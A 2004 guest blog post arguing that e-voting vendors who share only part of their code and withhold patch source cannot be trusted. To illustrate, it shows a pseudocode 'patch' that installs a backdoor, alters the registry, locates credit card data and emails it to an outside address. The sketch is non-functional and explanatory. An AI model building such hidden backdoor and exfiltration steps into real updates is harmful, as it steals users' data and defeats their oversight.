« They’ll have to learn to think smooth, I guess
Guess who’s back… »

A Very Bad Idea

Published by katster October 29th, 2004 in US Politics

[Every once in a while, we bring you a guest post from one or another of the Friends of the Zone. In this case, today’s guest is our good friend Shadur, who stumbled across an article on e-vote systems submitting only some of their code to the National Software Reference Library, and decides to expound on why this is a *bad* idea. -kat]

If you needed another reason to believe why “shared source” (Microsoft’s suggested ‘alternative’ to open source) is a stupid idea and anyone who uses it shouldn’t be trusted, here’s one.

Note especially that while on one hand they promise to show “some” of the current codebase to a small group of people who may or may not have the programming skill required to understand it, they explicitly state that they “might not” do the same with any subsequent “software patches, updates and upgrades”.

Now most of you will probably go “Uh, but what’s the point of showing part of the code in the first place if you don’t intend to show the whole thing?”, and you’d be right. But humor a tech geek and let me eludicate just how bad it can get.

Let’s imagine ourselves a hypothetical program that needs to be run with administrator privileges. Let’s call it “Hello World”, and the “shared source” version looks something like this:

main() {
printf(”Hello World!”);
}

Fair enough, perfectly innocuous, and it does precisely what it’s advertised to do according to the “shared source” available.

However, about a week before its planned deployment, the manufacturer releases an “urgent security update” that they say all the systems need to be patched with or the sky will fall down — and they won’t share the source for that patch “for security reasons”, citing that if they do that evil commie mutant hacker terrorists might figure out what’s wrong with the original code and OMG HAX0R Y00 KTHXWTFBBQ etc yadda yadda. They wrap enough legalese phrases around it stating that they will take no responsibility for what happens to your systems if you don’t install the patch and other comments in the same vein that everyone who bought the software in the first place is frightened into installing it.

However, the “patched” version of that software, which nobody but the author gets to see, looks something like this:

main() {
printf(”Hello World!”);
install_backdoor();
infect_registry();
data=locate_credit_card_data();
email(data,”authors@software.com”);
}

Oops.

Search